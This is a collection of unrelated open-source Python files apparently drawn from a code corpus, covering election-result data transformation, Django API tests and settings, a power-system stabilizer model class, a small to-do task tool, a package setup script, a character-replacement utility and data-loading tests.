% (JSON_EXAMPLE_PATH, fname),
'w', encoding='utf8') as f:
log.debug("writing output JSON: %s.json" % (fname))
f.write(json.dumps(d, ensure_ascii=False))
def t_rename_data(d=None, translation=None, p_keys=None):
'''translate desired data'''
target_dict = {}
try:
for k, v in translation.iteritems():
if (k in p_keys):
d[k] = format_percentage(d[k])
target_dict[v] = d[k]
except KeyError, e:
log.error("Could not find required key %s in %s" % (k, d))
raise Paso2015(__name__)
return target_dict
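# Illustrative example (invented values): with
#   d = {"votos": "1234", "pct": "12.3456", "id_partido": "7"}
# and translation=RESULTS_PARTY_RENAME, the result is
#   {"v": "1234", "p": format_percentage("12.3456"), "id": "7"}
# -- percentage keys listed in p_keys are reformatted in place first.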
def t_resumen_API(origin_dict=None):
'''get the desired data'''
target_dict = {}
try:
for k, v in RESUMEN_RENAME.iteritems():
target_dict[v] = origin_dict['resumen'][k]
except KeyError:
log.error("Could not find required key %s in %s" % (k, origin_dict))
raise Paso2015(__name__)
# Calculate table percentage
mp = get_percentage(target_dict, 'mi', 'mt')
target_dict["mp"] = mp
# Calculate voting percentage
vp = get_percentage(target_dict, 'v', 'e')
target_dict["vp"] = vp
return target_dict
def t_results_section_API(d=None, comuna=None, dest_dict=None):
'''Transform the received data
to the desired format'''
a99 = []
a00 = []
try:
if not comuna:
# 0 stores the global results for the election
data = d["general"][0]["partidos"]
else:
data = d["general"][0]["comunas"]["partidos"]
except (KeyError, IndexError), e:
log.error("Did not find data in memory. Reason" % (str(e)))
raise Paso2015(__name__)
try:
for idx, row in enumerate(data):
a00.append(t_rename_data(row, RESULTS_PARTY_RENAME, PERC_KEYS))
if len(row["listas"]) == 1:
# Do not include special parties inside "Listas únicas"
if row["id_partido"] not in SPECIAL_PARTIES:
a99.append(t_rename_data(row,
RESULTS_PARTY_RENAME,
PERC_KEYS))
else:
# Create transformed array for parties with many candidates
t_a = [t_rename_data(l, RESULTS_CAND_RENAME, PERC_KEYS)
for l in row["listas"]]
if not comuna:
# First time we see the party create a dictionary for it
# and append results
t_d = {"r": t_rename_data(row,
RESULTS_PARTY_SUMM_RENAME,
PERC_KEYS),
"c_%02d" % (comuna): t_a}
                    # Create the key for the political party
# inside the target dict
dest_dict["partido_%s"
% (row["id_partido"])] = t_d
else:
# For every other section
# We only need to create a section key
# with the candidates array
dest_dict["partido_%s"
% (row["id_partido"])]["c_%02d" % (comuna)] = t_a
except KeyError, e:
log.error("Error processing key. Reason %s" % (str(e)))
raise Paso2015(__name__)
except IndexError, e:
log.error("Error processing index. Reason %s" % (str(e)))
raise Paso2015(__name__)
dest_dict["partido_99"]["c_%02d" % (comuna)] = a99
dest_dict["partido_00"]["c_%02d" % (comuna)] = a00
def t_sort_results_API(d_d=None):
''' sort the results by descending percentage
taking into account special parties at the bottom'''
for k, v in d_d.iteritems():
if k == "resumen":
continue
if k == "partido_00":
sort_results_by_percentage(v, special=True)
else:
sort_results_by_percentage(v, special=False)
def t_results_API(origin_list=None, dest_dict=None):
'''main transformation
we need to switch from section based driven data
to political party driven data'''
for i, v in enumerate(origin_list):
log.debug("transform results for section %s" % (i))
t_results_section_API(v, i, dest_dict)
# Sort special party results
t_sort_results_API(dest_dict)
# Write to file to preview intermediate result
# to_json("datos_completos",dest_dict)
# QeQ candidates transformations
def t_candidates_percentage(d=None):
'''Transform candidates percentage for piece automation'''
try:
data = d[0]["general"][0]["partidos"]
except (KeyError, IndexError), e:
log.error("Error getting data from memory. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result = {}
cand_list = []
for row in data:
# Skip special political parties
try:
if row["id_partido"] in SPECIAL_PARTIES:
continue
if (float(row["pct"]) >= PASS_THRESHOLD):
party_passed = True
else:
party_passed = False
# Get maximum number of votes for a party primary
max_v = int(max(row["listas"],
key=lambda x: int(x["votos"]))["votos"])
for c_d in row["listas"]:
tmp_cand = {"id": c_d["id_candidato"],
"p": format_percentage(c_d["pct_total"]),
"g": "1" if (int(c_d["votos"]) == max_v) else "0",
"pp": "1" if party_passed else "0"}
cand_list.append(tmp_cand)
except (KeyError, ValueError, IndexError), e:
log.error("Failed to get the candidate percentage. Reason: %s"
% (str(e)))
raise Paso2015(__name__)
# Order candidate list by descending percentage
cand_list.sort(key=lambda x: float(x['p']), reverse=True)
result["candidatos"] = cand_list
return result
# Front page ranking transformations
def t_ranking(d_d=None):
'''Transformation to obtain the ranking data for
the front page'''
try:
data_parties = d_d["partido_00"]["c_00"]
data_summary = d_d["resumen"]
except KeyError, e:
log.error("Error getting data from memory. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result = {}
    # Get the share of voting tables already reported
result["mp"] = data_summary["mp"]
# Get the top three parties
parties_list = []
try:
for row in data_parties[0:3]:
party = {"id": row["id"], "p": row["p"]}
candidates_list = []
try:
data_primary = d_d["partido_%s" % (row["id"])]["c_00"]
for c in data_primary[0:2]:
candidates_list.append({"id": c["id"], "pt": c["pt"]})
            except KeyError:
                # Party not found among multi-candidate parties; look it up
                # among the single-list parties ("listas únicas") instead.
                try:
                    data_primary = d_d["partido_99"]["c_00"]
                    # "Listas únicas" carry a single percentage per party, so
                    # match this party's entry by id (the original referenced
                    # an undefined loop variable here).
                    for c in data_primary:
                        if c["id"] == row["id"]:
                            candidates_list.append({"id": c["id"], "pt": c["p"]})
                            break
except (KeyError, ValueError, IndexError), e:
log.error("Did not find the party. Reason %s"
% (str(e)))
raise Paso2015(__name__)
party["candidatos"] = candidates_list
parties_list.append(party)
except IndexError, e:
log.error("Did not find at least 3 parties. Reason %s"
% (str(e)))
raise Paso2015(__name__)
result["partidos"] = parties_list
return result
| mit | 3,808,144,704,324,429,300 | 34.235772 | 79 | 0.524919 | false |
eaudeweb/lcc-toolkit | lcc/tests/answer.py | 1 | 6176 | import json
from django.contrib.auth.models import User
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from lcc.models import (
Answer, Assessment, Country, Question
)
from lcc.serializers import AnswerSerializer
from lcc.tests.taxonomy import create_taxonomy_classication
class GetAnswersTest(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', '[email protected]', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ROU', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.question_2 = Question.objects.create(
text="Question 2 text", parent=None,
order=2, classification=self.classification)
self.question_3 = Question.objects.create(
text="Question 3 text", parent=self.question_1,
order=1, classification=self.classification)
self.question_4 = Question.objects.create(
text="Question 4 text", parent=self.question_2,
order=1, classification=self.classification)
self.answer_1 = Answer.objects.create(
assessment=self.assessment, question=self.question_1, value=True)
self.answer_2 = Answer.objects.create(
assessment=self.assessment, question=self.question_2, value=True)
self.answer_3 = Answer.objects.create(
assessment=self.assessment, question=self.question_3, value=False)
def test_get_all_answers(self):
response = self.client.get(reverse('lcc:api:answers_list_create'))
answers = Answer.objects.all()
serializer = AnswerSerializer(answers, many=True)
json_res = json.loads(response.content.decode())
json_ser = json.loads(json.dumps(serializer.data))
self.assertEqual(json_res, json_ser)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_single_answer(self):
response = self.client.get(
reverse('lcc:api:answers_get_update', args=[self.answer_1.pk]))
serializer = AnswerSerializer(self.answer_1)
json_res = json.loads(response.content.decode())
json_ser = json.loads(json.dumps(serializer.data))
self.assertEqual(json_res, json_ser)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_get_invalid_single_answer(self):
response = self.client.get(
reverse('lcc:api:answers_get_update', args=[100]),
expect_errors=True
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class CreateAnswersTest(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', '[email protected]', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ro', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.answer_valid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": True
}
self.answer_invalid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": None
}
def test_create_valid_answer(self):
response = self.client.post(
reverse('lcc:api:answers_list_create'),
json.dumps(self.answer_valid_payload),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_invalid_answer(self):
response = self.client.post(
reverse('lcc:api:answers_list_create'),
json.dumps(self.answer_invalid_payload),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
class UpdateSingleAnswer(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
'testuser', '[email protected]', 'test1234')
self.client.login(username='testuser', password='test1234')
self.country = Country.objects.create(iso='ROU', name='Romania')
self.assessment = Assessment.objects.create(
user=self.user, country=self.country)
self.classification = create_taxonomy_classication()
self.question_1 = Question.objects.create(
text="Question 1 text", parent=None,
order=1, classification=self.classification)
self.answer_1 = Answer.objects.create(
assessment=self.assessment, question=self.question_1, value=True)
self.answer_valid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": not self.answer_1.value
}
self.answer_invalid_payload = {
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": None
}
def test_valid_update_answer(self):
response = self.client.put(
reverse('lcc:api:answers_get_update', args=[self.answer_1.pk]),
json.dumps({
"assessment": self.assessment.pk,
"question": self.question_1.pk,
"value": False
}),
data_type='json',
content_type='application/json'
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
| gpl-3.0 | 359,729,923,295,122,600 | 37.842767 | 78 | 0.628886 | false |
rwl/PyCIM | CIM14/IEC61970/Dynamics/PowerSystemStabilizers/PssIEEE2B.py | 1 | 7134 | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.IEC61970.Dynamics.PowerSystemStabilizers.PowerSystemStabilizer import PowerSystemStabilizer
class PssIEEE2B(PowerSystemStabilizer):
"""IEEE (2005) PSS2B Model This stabilizer model is designed to represent a variety of dual-input stabilizers, which normally use combinations of power and speed or frequency to derive the stabilizing signal.
"""
def __init__(self, t11=0.0, vsi1max=0.0, t3=0.0, tw3=0.0, vstmax=0.0, t2=0.0, n=0, vsi1min=0.0, t9=0.0, ks2=0.0, vstmin=0.0, j1=0, tw1=0.0, tb=0.0, t7=0.0, vsi2max=0.0, t6=0.0, t1=0.0, m=0, vsi2min=0.0, a=0.0, t4=0.0, tw4=0.0, ks4=0.0, ta=0.0, ks3=0.0, t10=0.0, tw2=0.0, j2=0, ks1=0.0, t8=0.0, *args, **kw_args):
"""Initialises a new 'PssIEEE2B' instance.
@param t11: Lead/lag time constant
@param vsi1max: Input signal #1 max limit
@param t3: Lead/lag time constant
@param tw3: First washout on signal #2
@param vstmax: Stabilizer output max limit
@param t2: Lead/lag time constant
@param n: Order of ramp tracking filter
@param vsi1min: Input signal #1 min limit
@param t9: Lag of ramp tracking filter
@param ks2: Gain on signal #2
@param vstmin: Stabilizer output min limit
@param j1: Input signal #1 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
@param tw1: First washout on signal #1
@param tb: Lag time constant
@param t7: Time constant on signal #2
@param vsi2max: Input signal #2 max limit
@param t6: Time constant on signal #1
@param t1: Lead/lag time constant
@param m: Denominator order of ramp tracking filter
@param vsi2min: Input signal #2 min limit
@param a: Numerator constant
@param t4: Lead/lag time constant
@param tw4: Second washout on signal #2
@param ks4: Gain on signal #2 input after ramp-tracking filter
@param ta: Lead constant
@param ks3: Gain on signal #2 input before ramp-tracking filter
@param t10: Lead/lag time constant
@param tw2: Second washout on signal #1
@param j2: Input signal #2 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
@param ks1: Stabilizer gain
@param t8: Lead of ramp tracking filter
"""
#: Lead/lag time constant
self.t11 = t11
#: Input signal #1 max limit
self.vsi1max = vsi1max
#: Lead/lag time constant
self.t3 = t3
#: First washout on signal #2
self.tw3 = tw3
#: Stabilizer output max limit
self.vstmax = vstmax
#: Lead/lag time constant
self.t2 = t2
#: Order of ramp tracking filter
self.n = n
#: Input signal #1 min limit
self.vsi1min = vsi1min
#: Lag of ramp tracking filter
self.t9 = t9
#: Gain on signal #2
self.ks2 = ks2
#: Stabilizer output min limit
self.vstmin = vstmin
#: Input signal #1 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
self.j1 = j1
#: First washout on signal #1
self.tw1 = tw1
#: Lag time constant
self.tb = tb
#: Time constant on signal #2
self.t7 = t7
#: Input signal #2 max limit
self.vsi2max = vsi2max
#: Time constant on signal #1
self.t6 = t6
#: Lead/lag time constant
self.t1 = t1
#: Denominator order of ramp tracking filter
self.m = m
#: Input signal #2 min limit
self.vsi2min = vsi2min
#: Numerator constant
self.a = a
#: Lead/lag time constant
self.t4 = t4
#: Second washout on signal #2
self.tw4 = tw4
#: Gain on signal #2 input after ramp-tracking filter
self.ks4 = ks4
#: Lead constant
self.ta = ta
#: Gain on signal #2 input before ramp-tracking filter
self.ks3 = ks3
#: Lead/lag time constant
self.t10 = t10
#: Second washout on signal #1
self.tw2 = tw2
#: Input signal #2 code 1 shaft speed 2 frequency of bus voltage 3 generator electrical power 4 generator accelerating power 5 amplitude of bus voltage 6 derivative of bus voltage amplitude
self.j2 = j2
#: Stabilizer gain
self.ks1 = ks1
#: Lead of ramp tracking filter
self.t8 = t8
super(PssIEEE2B, self).__init__(*args, **kw_args)
_attrs = ["t11", "vsi1max", "t3", "tw3", "vstmax", "t2", "n", "vsi1min", "t9", "ks2", "vstmin", "j1", "tw1", "tb", "t7", "vsi2max", "t6", "t1", "m", "vsi2min", "a", "t4", "tw4", "ks4", "ta", "ks3", "t10", "tw2", "j2", "ks1", "t8"]
_attr_types = {"t11": float, "vsi1max": float, "t3": float, "tw3": float, "vstmax": float, "t2": float, "n": int, "vsi1min": float, "t9": float, "ks2": float, "vstmin": float, "j1": int, "tw1": float, "tb": float, "t7": float, "vsi2max": float, "t6": float, "t1": float, "m": int, "vsi2min": float, "a": float, "t4": float, "tw4": float, "ks4": float, "ta": float, "ks3": float, "t10": float, "tw2": float, "j2": int, "ks1": float, "t8": float}
_defaults = {"t11": 0.0, "vsi1max": 0.0, "t3": 0.0, "tw3": 0.0, "vstmax": 0.0, "t2": 0.0, "n": 0, "vsi1min": 0.0, "t9": 0.0, "ks2": 0.0, "vstmin": 0.0, "j1": 0, "tw1": 0.0, "tb": 0.0, "t7": 0.0, "vsi2max": 0.0, "t6": 0.0, "t1": 0.0, "m": 0, "vsi2min": 0.0, "a": 0.0, "t4": 0.0, "tw4": 0.0, "ks4": 0.0, "ta": 0.0, "ks3": 0.0, "t10": 0.0, "tw2": 0.0, "j2": 0, "ks1": 0.0, "t8": 0.0}
_enums = {}
_refs = []
_many_refs = []
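# Minimal usage sketch (not part of PyCIM; all parameter values here are
# hypothetical):
#   pss = PssIEEE2B(ks1=20.0, t1=0.16, t2=0.02, tw1=2.0, tw2=2.0,
#                   vstmax=0.1, vstmin=-0.1, j1=1, j2=3)
#   print pss.ks1, pss.vstmax  # attributes are plain values set in __init__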
| mit | -6,638,819,848,225,770,000 | 42.766871 | 448 | 0.614943 | false |
nathanielksmith/done | done/Tasks.py | 1 | 2607 | # who nate smith
# when march 2010
# why the done tool
# where midwest usa
import sys
from time import mktime, time
from datetime import datetime
import sqlite3
from termcolor import colored
import sql_interp.sql_interp as si
from Config import db_path
class Task:
def __init__(self, desc, due):
self.desc = desc
self.si = si.SQLInterp()
self.db = sqlite3.connect(db_path)
self.c = self.db.cursor()
self.due = datetime.fromtimestamp(due) if due else None
def add(self):
insert = {
"desc" : self.desc,
"created" : time()
}
if self.due:
insert["due"] = mktime(self.due.timetuple())
interped = self.si.interp("INSERT INTO tasks", insert)
self.c.execute(interped[0], interped[1])
self.db.commit()
print "\t *", self
def done(self):
sys.stdout.write("\t * " + str(self) + "? ")
answer = raw_input("[dN]:")
if answer == "d":
self.finish()
return True
return False
def remove(self):
sys.stdout.write("\t * " + str(self) + "? ")
answer = raw_input("[rmN]:")
if answer == "rm":
self.delete()
return True
return False
def finish(self):
where = { "desc":self.desc }
interped = self.si.interp("UPDATE tasks SET done=1 WHERE", where)
self.c.execute(interped[0], interped[1])
self.db.commit()
def delete(self):
where = { "desc":self.desc }
interped = self.si.interp("DELETE FROM tasks WHERE", where)
self.c.execute(interped[0], interped[1])
self.db.commit()
def pretty_due(self):
if not self.due:
return ""
due_string = self.due.strftime("%a, %Y-%m-%d %X")
overdue = lambda s: colored(s, "white", "on_red")
red = lambda s: colored(s, "red")
yellow = lambda s: colored(s, "yellow")
green = lambda s: colored(s, "green")
now = datetime.now()
delta = self.due - now
if delta.days < 0: # overdue
due_string = overdue(due_string)
if delta.days == 0:
due_string = red(due_string)
if delta.days == 1:
due_string = yellow(due_string)
if delta.days > 1:
due_string = green(due_string)
return due_string
def __str__(self):
due_string = self.pretty_due()
return "%s %s" % (self.desc, due_string)
| gpl-3.0 | -1,143,508,511,663,373,800 | 23.59434 | 73 | 0.519371 | false |
T2DREAM/t2dream-portal | setup.py | 1 | 3286 | import os
import sys
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.md')).read()
CHANGES = open(os.path.join(here, 'CHANGES.rst')).read()
requires = [
'snovault',
'Pillow',
'PyBrowserID',
'SQLAlchemy>=1.0.0b1',
'WSGIProxy2',
'WebTest',
'boto',
'botocore',
'jmespath',
'boto3',
'elasticsearch',
'lucenequery',
'future',
'humanfriendly',
'jsonschema_serialize_fork',
'loremipsum',
'netaddr',
'passlib',
'psutil',
'pyramid',
'pyramid_localroles',
'pyramid_multiauth',
'pyramid_tm',
'python-magic',
'pytz',
'rdflib',
'rdflib-jsonld',
'rfc3987',
'setuptools',
'simplejson',
'strict_rfc3339',
'subprocess_middleware',
'xlrd',
'zope.sqlalchemy',
]
if sys.version_info.major == 2:
requires.extend([
'backports.functools_lru_cache',
'subprocess32',
])
tests_require = [
'pytest>=2.4.0',
'pytest-bdd',
'pytest-mock',
'pytest-splinter',
'pytest_exact_fixtures',
]
setup(
name='encoded',
version='66.0',
description='Metadata database for ENCODE',
long_description=README + '\n\n' + CHANGES,
packages=find_packages('src'),
package_dir={'': 'src'},
include_package_data=True,
zip_safe=False,
author='Laurence Rowe',
author_email='[email protected]',
url='http://encode-dcc.org',
license='MIT',
install_requires=requires,
tests_require=tests_require,
extras_require={
'test': tests_require,
},
entry_points='''
[console_scripts]
batchupgrade = snovault.batchupgrade:main
create-mapping = snovault.elasticsearch.create_mapping:main
dev-servers = snovault.dev_servers:main
es-index-listener = snovault.elasticsearch.es_index_listener:main
add-date-created = encoded.commands.add_date_created:main
check-rendering = encoded.commands.check_rendering:main
deploy = encoded.commands.deploy:main
extract_test_data = encoded.commands.extract_test_data:main
es-index-data = encoded.commands.es_index_data:main
generate-ontology = encoded.commands.generate_ontology:main
import-data = encoded.commands.import_data:main
jsonld-rdf = encoded.commands.jsonld_rdf:main
migrate-files-aws = encoded.commands.migrate_files_aws:main
profile = encoded.commands.profile:main
spreadsheet-to-json = encoded.commands.spreadsheet_to_json:main
generate-annotations = encoded.commands.generate_annotations:main
index-annotations = encoded.commands.index_annotations:main
migrate-attachments-aws = encoded.commands.migrate_attachments_aws:main
migrate-dataset-type = encoded.commands.migrate_dataset_type:main
[paste.app_factory]
main = encoded:main
[paste.composite_factory]
indexer = snovault.elasticsearch.es_index_listener:composite
visindexer = snovault.elasticsearch.es_index_listener:composite
regionindexer = snovault.elasticsearch.es_index_listener:composite
[paste.filter_app_factory]
memlimit = encoded.memlimit:filter_app
''',
)
| mit | 1,263,833,566,525,261,800 | 28.339286 | 79 | 0.650335 | false |
neil92/MiscScripts2 | replace_every_xth_line.py | 1 | 1281 | #!/usr/local/miniconda3/bin/python
import argparse
def setupArguments():
    """
    This is the function that sets up the flags and the arguments you can pass to the script.
    :author: Neil A. Patel
    """
    aParser = argparse.ArgumentParser("Setup the arguments.")
    aParser.add_argument('-f', '--file', action='store', dest='file_target', required=True,
                         help="This is the file that will have every xth character replaced.")
    aParser.add_argument("-o", "--output", action='store', dest='file_output', required=True,
                         help="This is the file that will be output.")
    aParser.add_argument('-c', '--character', action='store', dest="target_character", required=False,
                         default="\n", help="This is an argument where you can specify which character you want to replace")
    # --replacement is an assumed addition: the original snippet never said
    # what to write in place of the target character (default: remove it).
    aParser.add_argument("-r", "--replacement", action="store", dest="replacement", required=False,
                         default="", help="String written in place of every xth target character.")
    aParser.add_argument("-p", "--period", action="store", dest="period", type=int, required=False,
                         default=2, help="The inverse of frequency. You want to replace the character every xth position.")
    return aParser.parse_args()
def main():
    args = setupArguments()
    with open(args.file_target) as file_target:
        with open(args.file_output, "w") as file_output:
            number_of_times_seen = 1
            for character in file_target.read():
                if character != args.target_character:
                    file_output.write(character)
                elif number_of_times_seen == args.period:
                    # every xth occurrence is replaced and the counter resets
                    file_output.write(args.replacement)
                    number_of_times_seen = 1
                else:
                    file_output.write(character)
                    number_of_times_seen += 1
if __name__ == "__main__":
    main() | mit | -5,675,658,794,333,368,000 | 39.03125 | 105 | 0.674473 | false |
bertnotbob/django-property | config/settings/base.py | 1 | 4530 | import dj_database_url, os
from django.core.exceptions import ImproperlyConfigured
def get_env_variable(var_name):
try:
return os.environ[var_name]
    except KeyError:
error_msg = 'Set the {} environment variable'.format(var_name)
raise ImproperlyConfigured(error_msg)
# Paths
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Secret Key
SECRET_KEY = get_env_variable('SECRET_KEY')
# Debug
DEBUG = True
# Allowed Hosts
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'homes',
'homes_for_sale',
'homes_to_let',
'homes_user',
'homes_agent',
'homes_json',
'homes_theme_default',
'django.contrib.humanize',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'mapwidgets',
'sorl.thumbnail',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Wsgi
WSGI_APPLICATION = 'config.wsgi.application'
# Database
DATABASES = {
'default': dj_database_url.config(conn_max_age=500)
}
DATABASES['default']['ENGINE'] = 'django.contrib.gis.db.backends.postgis'
# Password validation
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'debug_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, '../logs/debug.log') # Place outside of app location
},
'app_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, '../logs/app.log') # Place outside of app location
},
},
'loggers': {
'django': {
'handlers': ['debug_file'],
'level': 'DEBUG',
'propagate': True,
},
'app': {
'handlers': ['app_file'],
'level': 'DEBUG',
'propagate': True,
}
},
}
# Internationalization
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# AWS
AWS_STORAGE_BUCKET_NAME = get_env_variable('AWS_STORAGE_BUCKET_NAME')
AWS_ACCESS_KEY_ID = get_env_variable('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = get_env_variable('AWS_SECRET_ACCESS_KEY')
AWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME
# Static files
STATICFILES_LOCATION = 'static'
STATICFILES_STORAGE = 'config.custom_storages.StaticStorage'
STATIC_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, STATICFILES_LOCATION)
# Media files
MEDIAFILES_LOCATION = 'media'
MEDIA_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, MEDIAFILES_LOCATION)
DEFAULT_FILE_STORAGE = 'config.custom_storages.MediaStorage'
# Accounts
ACCOUNT_ACTIVATION_DAYS = 7
# User settings
LOGIN_REDIRECT_URL = '/user/dashboard/'
# Google
GOOGLE_MAPS_API_KEY=get_env_variable('GOOGLE_MAPS_API_KEY')
# Email
EMAIL_HOST = get_env_variable('EMAIL_HOST')
EMAIL_HOST_USER = get_env_variable('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = get_env_variable('EMAIL_HOST_PASSWORD')
EMAIL_PORT = get_env_variable('EMAIL_PORT') | mit | 5,718,639,544,731,947,000 | 25.343023 | 99 | 0.641501 | false |
tombosc/dict_based_learning | tests/test_data.py | 1 | 3193 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import base64
from fuel.datasets import IndexableDataset
from fuel.streams import DataStream
from dictlearn.data import (
LanguageModellingData, ExtractiveQAData, RandomSpanScheme)
from dictlearn.vocab import Vocabulary
from dictlearn.util import vec2str
from tests.util import TEST_TEXT, TEST_SQUAD_BASE64_HDF5_DATA
def test_languge_modelling_data():
temp_dir = tempfile.mkdtemp()
train_path = os.path.join(temp_dir, "train.txt")
with open(train_path, 'w') as dst:
print(TEST_TEXT, file=dst)
data = LanguageModellingData(temp_dir, 'standard')
# test without batches
stream = data.get_stream('train')
it = stream.get_epoch_iterator()
example = next(it)
# skip one
example = next(it)
assert len(example) == 1
assert len(example[0]) == 4
assert example[0][0][:5].tolist() == map(ord, '<bos>')
assert example[0][1][:5].tolist() == [ord('d'), ord('e'), ord('f'), 0, 0]
assert example[0][2][:5].tolist() == [ord('d'), ord('e'), ord('f'), 0, 0]
assert example[0][3][:5].tolist() == [ord('x'), ord('y'), ord('z'), 0, 0]
# test with batches
stream = data.get_stream('train', batch_size=2)
it = stream.get_epoch_iterator()
example = next(it)
# skip one
example = next(it)
assert len(example) == 2
assert example[0].shape == (2, 4, 100)
assert example[1].shape == (2, 4)
assert example[0][1, 2, :5].tolist() == [ord('d'), ord('e'), ord('f'), 0, 0]
assert example[1].tolist() == [[1., 1., 0., 0.], [1., 1., 1., 1.]]
os.remove(train_path)
os.rmdir(temp_dir)
def test_squad_data():
temp_dir = tempfile.mkdtemp()
train_path = os.path.join(temp_dir, 'train.h5')
with open(train_path, 'wb') as dst:
print(base64.b64decode(TEST_SQUAD_BASE64_HDF5_DATA), file=dst)
data = ExtractiveQAData(path=temp_dir, layout='squad')
stream = data.get_stream('train', batch_size=3, shuffle=True, seed=3)
assert set(stream.sources) == set(['contexts', 'contexts_mask',
'questions', 'questions_mask',
'answer_begins',
'answer_ends'])
batch = next(stream.get_epoch_iterator(as_dict=True))
assert batch['contexts'].ndim == 2
assert batch['contexts_mask'].ndim == 2
assert batch['questions'].ndim == 2
assert batch['questions_mask'].ndim == 2
assert batch['answer_begins'].tolist() == [45, 78, 117]
assert batch['answer_ends'].tolist() == [46, 80, 118]
longest = batch['contexts_mask'].sum(axis=1).argmax()
assert batch['contexts'][longest][-1] == data.vocab.eos
def test_random_span_scheme():
scheme = RandomSpanScheme(10000, 100, 1)
req_it = scheme.get_request_iterator()
assert next(req_it) == slice(235, 335, None)
dataset = IndexableDataset(['abc', 'def', 'xyz', 'ter'])
scheme = RandomSpanScheme(4, 2, 1)
stream = DataStream(dataset, iteration_scheme=scheme)
it = stream.get_epoch_iterator()
assert next(it) == (['def', 'xyz'],)
| mit | -2,698,814,175,180,520,400 | 34.876404 | 80 | 0.613216 | false |
